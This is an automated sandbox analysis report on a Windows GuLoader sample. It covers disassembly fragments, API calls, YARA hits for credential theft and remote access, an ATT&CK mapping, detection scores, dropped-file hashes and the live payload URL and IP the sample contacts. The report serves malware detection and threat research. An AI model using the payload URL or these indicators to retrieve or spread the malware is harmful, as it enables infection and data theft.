      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695BEC0 mov eax, dword ptr fs:[00000030h]9_2_3695BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695BEC0 mov eax, dword ptr fs:[00000030h]9_2_3695BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3695BEC0 mov eax, dword ptr fs:[00000030h]9_2_3695BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3697FEC0 mov eax, dword ptr fs:[00000030h]9_2_3697FEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_369DFEC5 mov eax, dword ptr fs:[00000030h]9_2_369DFEC5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36953EF4 mov eax, dword ptr fs:[00000030h]9_2_36953EF4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36953EF4 mov eax, dword ptr fs:[00000030h]9_2_36953EF4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36953EF4 mov eax, dword ptr fs:[00000030h]9_2_36953EF4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36983EEB mov ecx, dword ptr fs:[00000030h]9_2_36983EEB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36983EEB mov eax, dword ptr fs:[00000030h]9_2_36983EEB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36983EEB mov eax, dword ptr fs:[00000030h]9_2_36983EEB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36953EE1 mov eax, dword ptr fs:[00000030h]9_2_36953EE1
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3694DE10 mov eax, dword ptr fs:[00000030h]9_2_3694DE10
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3698BE17 mov eax, dword ptr fs:[00000030h]9_2_3698BE17
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36951E30 mov eax, dword ptr fs:[00000030h]9_2_36951E30
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_36951E30 mov eax, dword ptr fs:[00000030h]9_2_36951E30
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 9_2_3696DE2D mov eax, dword ptr fs:[00000030h]9_2_3696DE2D
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_3696DE2D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_3696DE2D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_3698BE51 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_3698BE51 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_369F9E56 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36965E40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36A0DE46 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_3694BE78 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36961F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36961F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36961F92 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36961F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36961F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36961F92 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36961F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36961F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36961F92 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36961F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36961F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36961F92 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_3694FF90 mov edi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_369F3F90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_369F3F90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36991FB8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_3698BFB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_3694BFD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_369D3FD7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36981FCD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36981FCD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36981FCD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36953FC2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36A0BFC0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36A0BFC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_3698BFEC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_3698BFEC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_3698BFEC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_369DDF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_369D1F13 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36A0DF2F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_369F7F3E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36951F50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36987F51 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_369CFF42 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_3697BF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36A0FCAB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36A0FCAB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36A0FCAB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36A0FCAB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36A0FCAB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 9_2_36A0FCAB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Process created: C:\Users\user\Desktop\Ntwph4urc1.exe "C:\Users\user\Desktop\Ntwph4urc1.exe"
Source: C:\Users\user\Desktop\Ntwph4urc1.exe, Code function: 5_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

Stealing of Sensitive Information

Source: Yara match, File source: 00000009.00000002.2644641710.00000000365B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match, File source: 00000009.00000002.2644641710.00000000365B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix, listed per tactic (the number in parentheses is the count the report attaches to that technique; techniques without a number carry no count in the report):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Access Token Manipulation (1); Process Injection (11); Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Network Logon Script; RC Scripts
Defense Evasion: Masquerading (1); Access Token Manipulation (1); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (211); File and Directory Discovery (2); System Information Discovery (23); System Network Configuration Discovery; Internet Connection Discovery; Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Clipboard Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label
Ntwph4urc1.exe | 75% | Virustotal | -
Ntwph4urc1.exe | 74% | ReversingLabs | Win32.Trojan.Guloader
Ntwph4urc1.exe | 100% | Joe Sandbox ML | -

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nszB5C8.tmp\System.dll | 0% | ReversingLabs | -

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
https://babalharra.com.au/yzSJO174.bin | 0% | Avira URL Cloud | safe
https://babalharra.com.au/ | 0% | Avira URL Cloud | safe
https://babalharra.com.au/o | 0% | Avira URL Cloud | safe
https://babalharra.com.au/yzSJO174.binF | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
babalharra.com.au | 122.201.127.17 | true | false | - | unknown

Name | Malicious | Antivirus Detection | Reputation
https://babalharra.com.au/yzSJO174.bin | false | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | Ntwph4urc1.exe, 00000009.00000001.1842784035.00000000005F2000.00000008.00000001.01000000.00000006.sdmp | false | - | high
https://babalharra.com.au/o | Ntwph4urc1.exe, 00000009.00000002.2624930358.0000000006968000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ftp.ftp://ftp.gopher. | Ntwph4urc1.exe, 00000009.00000001.1842784035.0000000000649000.00000008.00000001.01000000.00000006.sdmp | false | - | high
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | Ntwph4urc1.exe, 00000009.00000001.1842784035.00000000005F2000.00000008.00000001.01000000.00000006.sdmp | false | - | high
http://nsis.sf.net/NSIS_ErrorError | Ntwph4urc1.exe, 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Ntwph4urc1.exe, 00000005.00000000.1271388183.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Ntwph4urc1.exe, 00000009.00000000.1839438284.000000000040A000.00000008.00000001.01000000.00000003.sdmp | false | - | high
https://babalharra.com.au/ | Ntwph4urc1.exe, 00000009.00000002.2624930358.0000000006968000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | Ntwph4urc1.exe, 00000009.00000001.1842784035.0000000000649000.00000008.00000001.01000000.00000006.sdmp | false | - | high
https://babalharra.com.au/yzSJO174.binF | Ntwph4urc1.exe, 00000009.00000002.2624930358.0000000006968000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
122.201.127.17 | babalharra.com.au | Australia | 38719 | DREAMSCAPE-AS-AP Dreamscape Networks Limited AU | false
                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1588721
                  Start date and time:2025-01-11 04:48:40 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 37s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Run name:Run with higher sleep bypass
Number of new started processes analysed:22
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Ntwph4urc1.exe
                  renamed because original name is a hash value
                  Original Sample Name:ef82d714885adeb1ae55d801154e0489f3391ba0a632a10ae4caec482215fd6f.exe
                  Detection:MAL
                  Classification:mal80.troj.evad.winEXE@3/5@1/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 88%
                  • Number of executed functions: 41
                  • Number of non-executed functions: 307
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 20.190.160.22, 40.126.32.68, 40.126.32.140, 40.126.32.138, 20.190.160.17, 20.190.160.20, 40.126.32.74, 20.190.160.14, 13.107.246.45, 172.202.163.200
                  • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, tile-service.weather.microsoft.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, time.windows.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Not all processes were analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
122.201.127.17 | 02Eh1ah35H.exe | malicious | FormBook, GuLoader | -
122.201.127.17 | Document_084462.scr.exe | malicious | FormBook, GuLoader | -
122.201.127.17 | http://constructivesoftware.com.au | malicious | Unknown | -

Match | Associated Sample Name / URL | Detection | Threat Name | Context
babalharra.com.au | 02Eh1ah35H.exe | malicious | FormBook, GuLoader | 122.201.127.17
babalharra.com.au | Document_084462.scr.exe | malicious | FormBook, GuLoader | 122.201.127.17

Match | Associated Sample Name / URL | Detection | Threat Name | Context
DREAMSCAPE-AS-AP Dreamscape Networks Limited AU | 02Eh1ah35H.exe | malicious | FormBook, GuLoader | 122.201.127.17
DREAMSCAPE-AS-AP Dreamscape Networks Limited AU | http://www.austrata.net.au | malicious | Unknown | 185.184.154.201
DREAMSCAPE-AS-AP Dreamscape Networks Limited AU | https://snip.ly/kx81x2 | malicious | Unknown | 203.170.87.17
DREAMSCAPE-AS-AP Dreamscape Networks Limited AU | la.bot.arm5.elf | malicious | Mirai | 103.226.223.88
DREAMSCAPE-AS-AP Dreamscape Networks Limited AU | https://www.google.co.id/url?q=sf_rand(2000)CHARtTPSJ3J3wDyycT&sa=t&esrc=sf_rand(2000)gECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=sf_rand(2000)RlDJVS0YXpPkDfJ6C&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/apcarpetcleaning.com.au%2Fkom%2Fwp-images%2Fpoom%0A%2Fsf_rand_string_mixed(24)/tmitchell@encorecompliance.com | malicious | Unknown | 203.170.84.122
DREAMSCAPE-AS-AP Dreamscape Networks Limited AU | Last Annual payment.htm | malicious | Phisher | 203.170.84.122
DREAMSCAPE-AS-AP Dreamscape Networks Limited AU | http://www.therowlands.com.au/wp-includes/js/jquery/jquery-migrate.min.js | malicious | Unknown | 203.170.86.89
DREAMSCAPE-AS-AP Dreamscape Networks Limited AU | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 103.20.200.105
DREAMSCAPE-AS-AP Dreamscape Networks Limited AU | Document_084462.scr.exe | malicious | FormBook, GuLoader | 122.201.127.17

Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | 2976587-987347589.07.exe | malicious | Nitol, Xmrig | 122.201.127.17
37f463bf4616ecd445d4a1937da06e19 | 2976587-987347589.08.exe | malicious | Nitol | 122.201.127.17
37f463bf4616ecd445d4a1937da06e19 | 2976587-987347589.08.exe | malicious | Unknown | 122.201.127.17
37f463bf4616ecd445d4a1937da06e19 | yMXFgPOdf2.exe | malicious | GuLoader | 122.201.127.17
37f463bf4616ecd445d4a1937da06e19 | 2976587-987347589.07.exe | malicious | Unknown | 122.201.127.17
37f463bf4616ecd445d4a1937da06e19 | yMXFgPOdf2.exe | malicious | GuLoader | 122.201.127.17
37f463bf4616ecd445d4a1937da06e19 | 02Eh1ah35H.exe | malicious | FormBook, GuLoader | 122.201.127.17
37f463bf4616ecd445d4a1937da06e19 | LMSxhK1u8Z.exe | malicious | GuLoader | 122.201.127.17
37f463bf4616ecd445d4a1937da06e19 | ro7eoySJ9q.exe | malicious | GuLoader | 122.201.127.17

Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\nszB5C8.tmp\System.dll | 02Eh1ah35H.exe | malicious | FormBook, GuLoader | -
C:\Users\user\AppData\Local\Temp\nszB5C8.tmp\System.dll | 02Eh1ah35H.exe | malicious | GuLoader | -
C:\Users\user\AppData\Local\Temp\nszB5C8.tmp\System.dll | Document_084462.scr.exe | malicious | FormBook, GuLoader | -
C:\Users\user\AppData\Local\Temp\nszB5C8.tmp\System.dll | Document_084462.scr.exe | malicious | GuLoader | -
C:\Users\user\AppData\Local\Temp\nszB5C8.tmp\System.dll | PO.exe | malicious | GuLoader | -
C:\Users\user\AppData\Local\Temp\nszB5C8.tmp\System.dll | PO.exe | malicious | GuLoader | -
C:\Users\user\AppData\Local\Temp\nszB5C8.tmp\System.dll | yuc1Jwlkh5.exe | malicious | GuLoader | -
C:\Users\user\AppData\Local\Temp\nszB5C8.tmp\System.dll | yuc1Jwlkh5.exe | malicious | GuLoader | -
C:\Users\user\AppData\Local\Temp\nszB5C8.tmp\System.dll | IMAGE000Pdf.exe | malicious | GuLoader | -
                                          Process:C:\Users\user\Desktop\Ntwph4urc1.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:modified
                                          Size (bytes):12288
                                          Entropy (8bit):5.737556724687435
                                          Encrypted:false
                                          SSDEEP:192:MenY0qWTlt70IAj/lQ0sEWc/wtYbBH2aDybC7y+XBaIwL:M8+Qlt70Fj/lQRY/9VjjgL
                                          MD5:6E55A6E7C3FDBD244042EB15CB1EC739
                                          SHA1:070EA80E2192ABC42F358D47B276990B5FA285A9
                                          SHA-256:ACF90AB6F4EDC687E94AAF604D05E16E6CFB5E35873783B50C66F307A35C6506
                                          SHA-512:2D504B74DA38EDC967E3859733A2A9CACD885DB82F0CA69BFB66872E882707314C54238344D45945DC98BAE85772ACEEF71A741787922D640627D3C8AE8F1C35
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Joe Sandbox View:
                                          • Filename: 02Eh1ah35H.exe, Detection: malicious, Browse
                                          • Filename: 02Eh1ah35H.exe, Detection: malicious, Browse
                                          • Filename: Document_084462.scr.exe, Detection: malicious, Browse
                                          • Filename: Document_084462.scr.exe, Detection: malicious, Browse
                                          • Filename: PO.exe, Detection: malicious, Browse
                                          • Filename: PO.exe, Detection: malicious, Browse
                                          • Filename: yuc1Jwlkh5.exe, Detection: malicious, Browse
                                          • Filename: yuc1Jwlkh5.exe, Detection: malicious, Browse
                                          • Filename: IMAGE000Pdf.exe, Detection: malicious, Browse
                                          Reputation:moderate, very likely benign file
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...X..`...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text...O .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\Ntwph4urc1.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):116773
                                          Entropy (8bit):1.2617404262864118
                                          Encrypted:false
                                          SSDEEP:768:4yTqkjNz46YyMqMTGZGi7vk59sktCQ3am6ZRN8rOFlS70dhEr:0avCLJ
                                          MD5:753C4F9B2F84095556E2C65E2569D814
                                          SHA1:3F878C44B311B8C34B2A6E09F49324D42FAD1437
                                          SHA-256:E6DCE06287ACEBCFB23DA58EAC6AAA36E253BADB493125F47E801B99C4E48B25
                                          SHA-512:8C19F357F4A59D5CB493F418C82B0D06ECED25EC9D05E9B1CFF943A6A79232DC6B2EBC3552B0BFBA76018A7FCEFE8A0410ADEE739151640F149884A4FC3DF651
                                          Malicious:false
                                          Reputation:low
                                          Preview:..................................................V...................Y..Y................................................................................................................M.......................................................................................*.......................`...............................................A................D....D....................................................."................................................l.............\.....%....:......*.......................................................................................c.....M........?......................5........G...................................................U.........................................................................5.8...s................[.....m.....{...........................)$..................................................lm.....................................................}................................................................
                                          Process:C:\Users\user\Desktop\Ntwph4urc1.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):222131
                                          Entropy (8bit):1.2548431305039245
                                          Encrypted:false
                                          SSDEEP:768:I2mmH3AhfHp+POGgRSRFZHl2bxYLbBjJ4tFGZjDyYqIx3x9+6yiKk+vlK5u5DF+G:UoNwkuoHtyiKJlQVD
                                          MD5:C018B5D87F38B0DBA90AFE75F72B6798
                                          SHA1:9B43AE84826B712BB8152D70D2D7B929DB5CE3E2
                                          SHA-256:323B7D5F0C7A4F9FA87D8F6DD9A18E81F4284C31DA4FDD5FFE7022501445FD1C
                                          SHA-512:D4D6A99EBA1F594BA4052F4C83C93946749EE7524D5765CFD67C0CD34BBA3F1ABBDEA259EBE155A3767898AAE806E29E42BE6539C4A2DC067730EC6D9655ECD5
                                          Malicious:false
                                          Reputation:low
                                          Preview:.....................................%..................................................................................................................L....B..............................I...........]...........i.........A............\............................................................................................................................................................................................&..............s............................................................................(........].........................................................................,..............]...............F..............G....+..............................................F..............9...........,........i.............................................................................................h...k........................Y......k..........................................................U..........R..................................C...........e..................
                                          Process:C:\Users\user\Desktop\Ntwph4urc1.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):282823
                                          Entropy (8bit):7.646614769640198
                                          Encrypted:false
                                          SSDEEP:6144:lvvE12Nsu4oMNgJMD20aAW49+ShpU5tgrLMpaP:lXmkMNOZq+Sh1rL4Y
                                          MD5:9CE7FE4FC49B74D4A9E8E63C97EDA3D7
                                          SHA1:0DF4A59A5F43A5A406B28D449369D25B4EA35B49
                                          SHA-256:ECB2D16F05215EE09B30050618170CBFD7B6E52D128B4429F69D1B419974842C
                                          SHA-512:7F55112F98B31966A41DBD77AA416BA8964CE689679E2EA4C218398FBAD1319C5ABDE73222DCDCD6CEB53F5A1224234427F611686DD44DB29919230587782C98
                                          Malicious:false
                                          Reputation:low
                                          Preview:.....kk.t...[[[[.......S...Z........................33...u...,........U......f...pp...........`............................................`...............W............II....l......................,,,...........kk.........99.............................?.N......##.......xx...F........%.n...T........vvv...................."....................:...........pp..++......IIIII...$...{..{.uu....................4444..$.E.%..#........................v.......................L..{...;.GG....mm.......oo.J.K...P.JJJ.......}}.....//..........RR.........................%%%%.....8..9.......F...ll........................j..........gg......%%........o................#......WWWWW.............................*......R............s.....HH...................i.HH....P.....d.......p.................D......---....NN.......yy.j...................99................?.........................[[....>>>>..................................LL...........U....................4...$...`....55....................J.=..........
                                          Process:C:\Users\user\Desktop\Ntwph4urc1.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):477418
                                          Entropy (8bit):1.2516735777117096
                                          Encrypted:false
                                          SSDEEP:1536:BugSY71rrh1lxz0ZSyCjm0eydI6Vl73+ByRgN:F7Zrh4SvQy3SBGgN
                                          MD5:B86B0A4CFA46775BAEEE023CCECA54E1
                                          SHA1:16BABC347EBFC80762D73A12FF39E5ADE55EC7DB
                                          SHA-256:7B1E45A0398C8428C6CF476DAE264102A842FACC20930B57688960046FF087F6
                                          SHA-512:42787A7037E7D117D82AF3580306C7C10854B279CEC0B38956217B4E04222B34EAC50763B0DB850454DC0AA43B5238297D39FC8E5A681C805966E0BCCD4E7C0D
                                          Malicious:false
                                          Preview:.................................E..............................................................................................................................F......................................./..............#...........n...t..>..........]...............".................|................................4...........s...z......................................................................................U......................................................................J...............................................................j......................-......."...._..............;.............X........................3.H....................................P........#...............L.....................................,......................................R........&..............................................................................................................`<.....f......E..al.....................S..........................................V..............
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.957710020525607
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:Ntwph4urc1.exe
                                          File size:437'610 bytes
                                          MD5:c57da1bb37a79e6f05722518dbadb3ce
                                          SHA1:c7d63301754e2a380d29a9170654670e4beeb1ad
                                          SHA256:ef82d714885adeb1ae55d801154e0489f3391ba0a632a10ae4caec482215fd6f
                                          SHA512:872e1e462cd6ebdd2140463fa8ad91675840a754b4c3ef52641c7bcfdb4d8951decbffb284344e9a8a2c2ad93d8821ea973eac6d434552d7a88236a1a054f933
                                          SSDEEP:12288:B3UIjsVFWZn9dzBoT2T/B1iP4C5tU2US0zT:B3UIjsVFWZf1oPPbU2US0z
                                          TLSH:F3942384B2D0A337D9EB6F31693A23321E9D48505C7DB3434F5C7A10773968A9B2E7A1
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L......`.................f....:....
                                          Icon Hash:3d2e0f95332b3399
                                          Entrypoint:0x4034a2
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
